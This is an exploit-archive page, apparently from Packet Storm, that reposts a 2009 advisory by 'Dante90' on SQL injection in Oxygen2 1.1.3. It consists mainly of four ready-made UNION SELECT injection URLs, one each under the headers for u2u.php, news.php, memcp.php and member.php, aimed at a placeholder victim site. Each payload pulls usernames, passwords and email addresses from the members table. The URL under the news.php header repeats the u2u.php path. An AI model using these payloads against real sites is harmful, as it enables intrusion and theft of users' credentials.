what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oxygen2 1.1.3 SQL Injection

Oxygen2 1.1.3 SQL Injection
Posted Mar 5, 2009
Authored by Dante90 | Site warwolfz.org

Oxygen2 versions 1.1.3 and below suffer from remote SQL injection vulnerabilities in u2u.php, news.php, member.php, and memcp.php.

tags | exploit, remote, php, vulnerability, sql injection
SHA-256 | 4dd7ca3c243bf88237dc4a5e677c1845dbcc22ca138875262fbbc4d71e433d21

Oxygen2 1.1.3 SQL Injection

Change Mirror Download

[0-Day] SQL Injection Oxygen2 -= 1.1.3 (u2u.php) By Dante90



######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (u2u.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################


[0-Day] SQL Injection Oxygen2 <= 1.1.3 (u2u.php) By Dante90

[code]

http://www.victime_site.org/WaRWolFz/u2u.php?action=view&folder=inbox&u2uid=-1 ' UNION SELECT 1,password,username,4,5,email,7,8 FROM o2_members WHERE uid = 1/*&user=Dante90

[/code]

Dante90


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



[0-Day] SQL Injection Oxygen2 -= 1.1.3 (news.php) By Dante90



######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (news.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################


[0-Day] SQL Injection Oxygen2 <= 1.1.3 (news.php) By Dante90

[code]

http://www.victime_site.org/WaRWolFz/u2u.php?action=view&folder=inbox&u2uid=-1 ' UNION SELECT 1,2,3,username,password,6,7 FROM o2_members WHERE uid = 1/*

[/code]

Dante90


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



[0-Day] SQL Injection Oxygen2 -= 1.1.3 (memcp.php) By Dante90



######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (memcp.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################


[0-Day] SQL Injection Oxygen2 <= 1.1.3 (memcp.php) By Dante90

[code]

http://www.victime_site.org/WaRWolFz/memcp.php?action=avatargal&user=-1 ' UNION SELECT 1,CONCAT(status,CHAR(32,58,32),username,CHAR(32,58,32),password,CHAR(32,58,32),email) FROM o2_members WHERE uid = 1/*

[/code]

Dante90


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



[0-Day] SQL Injection Oxygen2 -= 1.1.3 (member.php) By Dante90



######################################################################################
# #
# Author: Dante90, WaRWolFz Crew #
# Title: [0-Day] SQL Injection Oxygen2 <= 1.1.3 (member.php) By Dante90 #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# #
######################################################################################


[0-Day] SQL Injection Oxygen2 <= 1.1.3 (member.php) By Dante90

[code]

http://www.victime_site.org/WaRWolFz/member.php?action=viewpro&member=-1 ' UNION SELECT uid,username,password,regdate,postnum,site,aim,status,location,bio,sig,sightml,showemail,timeoffset,icq,avatar,yahoo,customstatus,theme,bday,bmonth,byear,langfile,tpp,ppp,newsletter,regip,timeformat,msn,dateformat,ignoreu2u,lastvisit,rating,realname,firstname,emailnotify,profileviews,u2upopup,hidden,hidesig,hideavatar,logintime,readtopics,44,45,46 FROM o2_members WHERE username='Dante90'/*

[/code]

Dante90


























_________________________________________________________________
Scopri le keyword piĆ¹ cercate della settimana!
http://clk.atdmt.com/GBL/go/136430524/direct/01/
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close